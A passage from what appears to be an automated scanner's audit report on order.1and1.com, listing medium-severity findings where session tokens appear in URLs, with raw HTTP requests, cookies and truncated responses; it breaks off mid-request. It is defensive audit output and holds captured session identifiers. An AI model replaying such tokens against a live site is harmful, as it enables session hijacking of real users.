Set-Cookie: UT=yZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; Expires=Fri, 07-Apr-2079 21:08:23 GMT; Path=/
ETag: dd3a6908188586141eb93efcd06408c1
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 25297


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.99. http://order.1and1.com/xml/order/VirtualServerL

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServerL

Issue detail

The response contains the following links, each rewritten with the ;jsessionid= path parameter (the same value as in the request URL), so every navigation from this page carries the session token onward:

Request

GET /xml/order/VirtualServerL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&ordernow=true HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=CloudDynamicServer&linkId=hd.tab.vps
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=CloudDynamicServer; ucuo=20110320185042-000.TCpfix141a; lastpage=VirtualServer; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=hdWo6PT40XV1dV2pgZy1lXyweKGFUTj1UR0EpLSoqKScpJyQkJyYgIycaHBsaLlNBbWJkciosJ1cwWmkvIiMfHiMfHSA1LzcuLTZubzUqMWFqMCMkIB8kIR8fHjMxMzY=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:31:AAABLtRnmq4LJJFFFit1Kk3sM2vCTUk2:1300643682990; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:54:24 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=aZVoqLS4kZGRkXnFnbjRsZjMlL2hbVS1ENzEZHRoxMC4wLisrLi0nKi4hIyIhHkMxXVJUYjEzLl43YXA2KSomJSomJCclHyceHSZedjwxOGhxNyorJyYrKCYmJSMhIyY=; Expires=Fri, 07-Apr-2079 21:08:31 GMT; Path=/
ETag: 8445c1f0969d65ef75b448c84b35d290
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 48662


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=VirtualServerL&amp;linkOrigin=VirtualServerL&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=VirtualServerL&amp;page=switch&amp;linkOrigin=VirtualServerL&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
</p><a class="core_button_normal" onclick="return !window.open(this.href,'_blank','toolbar=no,location=no,status=yes,menubar=no,scrollbars=yes,resizable=yes,width=665,height=480,screenX=100,screenY=100');" href="/xml/order/FeatureServerMonitoring;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff"><strong>
...[SNIP]...
<span class="osLinux"><a rel="height=480, width=665" class="btn btn-detail-darkblue btn-pos-detail window-open" href="/xml/order/FeatureServerVpsOsLinux;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">
Details
</a>
...[SNIP]...
<span class="osWindows"><a rel="height=480, width=665" class="btn btn-detail-darkblue btn-pos-detail window-open" href="/xml/order/FeatureServerVpsOsWindows;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">
Details
</a>
...[SNIP]...
<td class="link"><a class="core_button_normal" onclick="return !window.open(this.href,'_blank','toolbar=no,location=no,status=yes,menubar=no,scrollbars=yes,resizable=yes,width=665,height=480,screenX=100,screenY=100');" href="/xml/order/FeatureServerMonitoring;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureParallelsPlesk;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerProcessor;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerHarddrive;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerVpsOsLinux;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerVpsOsWindows;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureParallelsSB;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureParallelsPlesk;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureControlCenter;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureServerSsl;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureFtpBackup;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureDomainDomains;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureDomainDomains;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureDomainDomains;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureWebdesignIstock;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsMerchandise;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
<td class="link"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureFtpBackup;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">

Details

</a>
...[SNIP]...
</p><a rel="height=590, width=665" class="window-open" href="/xml/order/popupGreenPower;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">More...</a>
...[SNIP]...
</p><a rel="height=480, width=643" class="window-open" href="/xml/order/popupPayPalInfo;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">More...</a>
...[SNIP]...
<br><a class="core_button_normal" href="/xml/order/TcSpecialOffers;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">Click here</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=VirtualServerL&amp;linkOrigin=VirtualServerL&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.100. http://order.1and1.com/xml/order/VirtualServerL

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServerL

Issue detail

The request URL carries the session token as a ;jsessionid= path parameter (servlet URL rewriting) ahead of the query string. A token in the URL is written to proxy and server logs and browser history, and is sent in the Referer header to any site linked from the page; the Referer line of this request shows the token arriving from the VirtualServer page:

Request

GET /xml/order/VirtualServerL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&ordernow=true HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=CloudDynamicServer&linkId=hd.tab.vps
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=CloudDynamicServer; ucuo=20110320185042-000.TCpfix141a; lastpage=VirtualServer; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=hdWo6PT40XV1dV2pgZy1lXyweKGFUTj1UR0EpLSoqKScpJyQkJyYgIycaHBsaLlNBbWJkciosJ1cwWmkvIiMfHiMfHSA1LzcuLTZubzUqMWFqMCMkIB8kIR8fHjMxMzY=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:31:AAABLtRnmq4LJJFFFit1Kk3sM2vCTUk2:1300643682990; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:54:24 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=aZVoqLS4kZGRkXnFnbjRsZjMlL2hbVS1ENzEZHRoxMC4wLisrLi0nKi4hIyIhHkMxXVJUYjEzLl43YXA2KSomJSomJCclHyceHSZedjwxOGhxNyorJyYrKCYmJSMhIyY=; Expires=Fri, 07-Apr-2079 21:08:31 GMT; Path=/
ETag: 8445c1f0969d65ef75b448c84b35d290
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 48662


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.101. http://order.1and1.com/xml/order/VirtualServerXL

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServerXL

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/VirtualServerXL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&ordernow=true HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:51:16 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/VirtualServerXL?__frame=_top&__lf=Order-Tariff&ordernow=true
Content-Length: 0
Connection: close
Content-Type: text/plain


3.102. http://order.1and1.com/xml/order/VirtualServerXXL

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServerXXL

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/VirtualServerXXL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&ordernow=true HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:51:20 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/VirtualServerXXL?__frame=_top&__lf=Order-Tariff&ordernow=true
Content-Length: 0
Connection: close
Content-Type: text/plain


3.103. http://order.1and1.com/xml/order/a

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/a

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/a;jsessionid=32FBEC28C43E74DBD62611CCB0A88751.TCpfix142a HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/VirtualServerL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&ordernow=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320185042-000.TCpfix141a; lastpage=MsHosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=1bmMzNjctVlZWUGNZYCZebzwuOHFkXjZNQDoiJiMjIiAiIB0dIB8wMzcqLCsqJ0w6ZltdayMlIFApU2IoGzMvLjMvLTAuKDAnJi9naC4jKlpjKRwdMC80MS8vLiwqLC8=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:36:AAABLtRpVq_aAytDkGAYcbJbpeGoxEgR:1300643796655; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; __PFIX_TST_=11df10d3b144d000

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 17:56:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1439

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>1&amp;1 Internet AG - Page or Document not found</title>
<meta h
...[SNIP]...

3.104. http://order.1and1.com/xml/order/addon

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/addon

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/addon;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=domaincheck&linkId=hd.tab.packageselection HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:52:13 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/addon?__frame=_top&__lf=Order-Tariff&linkOrigin=domaincheck&linkId=hd.tab.packageselection
Content-Length: 0
Connection: close
Content-Type: text/plain


3.105. http://order.1and1.com/xml/order/costs

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/costs

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=domaincheck&linkId=hd.tab.yourcart HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
